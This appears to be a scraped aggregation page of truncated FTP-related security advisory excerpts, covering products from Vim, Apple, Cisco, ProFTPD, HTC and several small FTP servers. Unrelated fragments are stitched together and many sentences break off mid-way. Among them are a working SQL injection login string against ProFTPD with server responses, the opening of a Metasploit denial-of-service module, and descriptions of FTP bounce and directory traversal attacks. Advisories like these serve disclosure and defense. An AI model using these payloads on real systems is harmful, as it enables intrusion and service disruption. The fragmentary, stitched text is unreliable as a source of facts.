FTP server
On 12/08/08 23:59, Jan Minář wrote:
> Vim: Netrw: FTP User Name and Password Disclosure
>
> 1. SUMMARY
>
> Product : Vim -- Vi IMproved
> Versions : Tested with Vim 7.1.266, 7.2, autoload/netrw.vim v131, v109
> Impact : Credentials disclosure
> Wherefrom: Remote
> Original : http://www.rdancer.org/vulnerablevim-netrw-credentials-dis.html
XM Easy Personal FTP Server Multiple DoS vulnerabilities
Credits:
NeerajT of Nevis Labs
http://www.nevisnetworks.com/services.php?id=10
Date of Discovery: 14-May-2009
Vendor: Dxmsoft
URL: http://www.dxm2008.com/
HISPASEC
Security Advisory
http://blog.hispasec.com/lab/
Name : 2K7SEPT6 X-Diesel Unreal Commander v0.92 (build 573)
multiple FTP-based vulnerabilities
Class : Remote directory traversal, Remote DoS
Threat level : HIGH
Discovered : 2007-09-06
Published : 2007-08-24
Credit : Gynvael Coldwind
The FTP proxy used in Apple's Airport Express, Airport Extreme, Time Capsule and possibly elsewhere doesn't check the client-provided address and port given by the FTP PORT command against the IP address of the connecting client, or against the use of privileged ports. (The FTP PORT command is used by an FTP client to tell an FTP server which address and data port to initiate the data connection on.) The FTP proxy is used to provide assistance to clients operating in NAT environments served by the Apple products. FTP servers running behind a NAT with this assistance can have addresses in the command channel rewritten for them so that external clients can reach them when operating in passive mode. The ALG operates as a proxy server, assuming responsibility for connections to the FTP server, and must therefore also handle and modify rewriting of the PORT command. It looks like it might be ftp-proxy from PF.
The effect of this problem is to allow anybody with access to the FTP port forwarded on the exterior side of an Apple Airport product that offers NAT to internal clients, which for a publicly-accessible FTP server is the big bad world, to induce an FTP server operating behind a NAT to send data to arbitrary addresses and ports. This is true even if the FTP server is configured to operate more securely, since it sees connections from the NAT's exterior interface, not the connecting client. This is useful for bouncing anonymous port scans off the victim NAT, or if data is available or can be written to and then read from the FTP server, potentially for anonymous attacks, spam, news floods, and other such badness. Any trust relationship and/or security implied or assumed by a NAT is also gone, since the PORT command can also specify private addresses, inside the NAT, for victimisation. Best of all, the gateway itself makes no log entry concerning FTP connections that have been run through the proxy.
Workarounds: do not use FTP; do not trigger the use of the ALG (FTP proxy) by explicitly using ports other than 21 on the inbound port mapping. If you can't do those things, you can avoid the worst effects of this attack by disabling FTP uploads that can later be downloaded by anonymous users.
Apple likes to keep secrets for the protection of its customers. Since the reasonable release of this advisory removes that protection, confidential information vouchsafed to me can be safely disclosed with no ill effects. Apple has a fix, and according to its last seemingly automatic template message, they are still testing it and do not know precisely when it will be released. This is confidential information. DO NOT DISCLOSE!
Advisory history:
Microsoft FTP Client Multiple Buffer Overflow
Vulnerability
#####################################################################
XDisclose Advisory : XD100096
Vulnerability Discovered: November 20th 2007
Advisory Reported : November 28th 2007
Credit : Rajesh Sethumadhavan
http://www.security-database.com/toolswatch/AS-400-Auditing-Framework-Beta.html
5) Comments of note:
> ... some default services on AS/400 allow
> anonymous access including POP3, SMTP, LDAP, FTP, etc. But what
> fails audit almost every time are default passwords.
> ... security of these beasts had not been in forefront for
> most companies. Some of them run their e-commerce solutions on AS/400
> facing the Internet
require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::Ftp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'XM Easy Personal FTP Server 5.8.0 Type DoS',
HISPASEC
Security Advisory
http://blog.hispasec.com/lab/
Name : 2K7SEPT6 Total Commander 7.01 Remote FTP Client
Directory Traversal
Class : Remote Directory Traversal
Threat level : HIGH
Discovered : 2007-08-25
Published : 2007-09-06
|------------------------------------------------------------------|
Advisory : CORELAN-10-004
Disclosure date : Jan 12, 2010
Corelan Reference :
http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-004-turboftp-server-1-00-712-dos/
0x00 : Vulnerability information
--------------------------------
Check Point Software Technologies - Vulnerability Discovery Team (VDT)
http://www.checkpoint.com/defense/
Web commands injection through FTP Login in Synology Disk Station
CVE-2010-2453
INTRODUCTION
Synology Inc develops high-performance, reliable, versatile, and environmentally-friendly Network Attached Storage (NAS) products. Synology's goal
HISPASEC
Security Advisory
http://blog.hispasec.com/lab/
Name : 2K7SEPT6 Magellan Explorer 3.32 build 2305 Remote FTP
Client Directory Traversal
Class : Remote Directory Traversal
Threat level : HIGH
Discovered : 2007-08-14
Published : 2007-09-06
Credits: zhangmc[at]mail.ustc.edu.cn
Vendor: Dxmsoft
Affected:
XM Easy Personal FTP Server 5.8.0
Earlier versions may also be affected
Overview:
XM Easy Personal FTP Server is an easy-to-use FTP server application. A denial of service vulnerability exists in XM Personal FTP Server that causes the application to crash when "LIST" is sent to the FTP server if you do not use "PASV" or "POST" first.
This is Paul Oxman with Cisco PSIRT.
The Cisco published advisory that Andy references is
located at:
http://www.cisco.com/warp/public/707/cisco-sa-20070509-iosftp.shtml
Regards
Name: Paul Oxman
Phone: +65 6317 7418
Credits:
leinakesi[at]gmail.com
Vendor:
Core FTP
Affected:
Core FTP Server 1.0 build 347.
Earlier versions may also be affected.
Title:
======
PSFTP v.1.8 Build 921 - Null Pointer (DoS) Vulnerability
Date:
=====
2012-04-23
Credits: zhangmc[at]mail.ustc.edu.cn
Vendor:
Ari Pikivirta
http://downstairs.dnsalias.net/homeftpserver.html
Affected:
Home FTP Server 1.10.1.139
Earlier versions may also be affected
#####################################################################################
Application: Cerberus FTP 3.0.6
Platforms: Windows XP Professional SP2
Windows Vista SP1
crash: YES
Exploitation: Remote DoS
Advisory: Google Chrome FTP PASV IP Malicious Port Scanning Vulnerability.
Version Affected:
Google Chrome: 1.0.154.36
Description:
Google Chrome FTP Client is vulnerable to FTP PASV malicious port
scanning vulnerability. The username in the
FTP (ftp://username:password@domain.com) can be manipulated by tampering
it with certain IP address with
Title: HTC / Android OBEX FTP Service Directory Traversal
Author: Alberto Moreno Tablado
Vendor: HTC
Products:
- HTC devices running Android 2.1
- HTC devices running Android 2.2
References: http://www.seguridadmobile.com/android/android-security/HTC-Android-OBEX-FTP-Service-Directory-Traversal.html
Summary:
HTC devices running Android 2.1 and Android 2.2 are prone to a directory traversal vulnerability in the Bluetooth OBEX FTP Service. Exploiting this issue allows a remote authenticated attacker to list arbitrary directories, and read arbitrary files, via a ../ in a pathname.
Credits:
leinakesi[at]gmail.com
Vendor:
Core FTP mini-sftp-server
http://www.coreftp.com/server/index.html
Affected:
Core FTP mini-sftp-server version 1.19.
Earlier versions may also be affected.
Hi,
The IOS FTP server vulnerabilities were published in an advisory by
Cisco in May 2007. The FTP server does not run by default, it is not
widely used and has since been removed from new versions of IOS.
Therefore, I took the decision to release this exploit code in order
to show that IOS can be reliably exploited to provide remote level 15
exec shell access. This clearly demonstrates that patching your router
is just as important as patching your servers.
Discovery Date: Nov 14, 2009
Risk: Important
Affected Software:
* Wing FTP Server 3.1.2
Description:
There is a Denial of Service
(DoS) vulnerability that exists in Wing FTP Server 3.1.2. The
Credits:
leinakesi[at]gmail.com
Vendor:
Turbo FTP Server
Affected:
Turbo FTP Server 1.20.745.
Earlier versions may also be affected.
[DCA-0007]
[Software]
- Quick 'n Easy FTP Server
[Vendor Product Description]
- Quick 'n Easy FTP Server Professional is a multi threaded FTP
server for Windows 98/NT/XP and Vista(32 bits) that can be easily
Looks like a very serious issue to me - it works on our ProFTPD
1.3.2rc2 Server (latest stable on gentoo).
220 ProFTPD 1.3.2rc2 Server (Pumpkin) [xx.xx.xx.xx]
USER %') and 1=2 union select
1,0x24312452565a583533784324716a304d4d6b4670426b4b486177644264756634392f,uid,gid,homedir,shell
from ftp #
331 Password required for %')
PASS 1
230 User %') and 1=2 union select
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Netkit FTP Server: Denial of Service
Date: January 29, 2008
Bugs: #199206
ID: 200801-17
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
IBM AIX ftp domacro Parameter Buffer Overflow Vulnerability
iDefense Security Advisory 10.30.07
http://labs.idefense.com/intelligence/vulnerabilities/
Oct 30, 2007
I. BACKGROUND
The ftp program is a client application for accessing data stored on FTP
servers. This client is responsible for interfacing with users and
Date of Discovery: 16-Nov-2009
Credits: zhangmc[at]mail.ustc.edu.cn
Vendor: Ari Pikivirta
http://downstairs.dnsalias.net/homeftpserver.html
Affected:
Home FTP Server 1.10.1.139
Earlier versions may also be affected
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01446326
Version: 1
HPSBUX02334 SSRT071403 rev.1 - HP-UX Running ftp, Remote Denial of Service (DoS)
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2008-05-12
Last Updated: 2008-05-12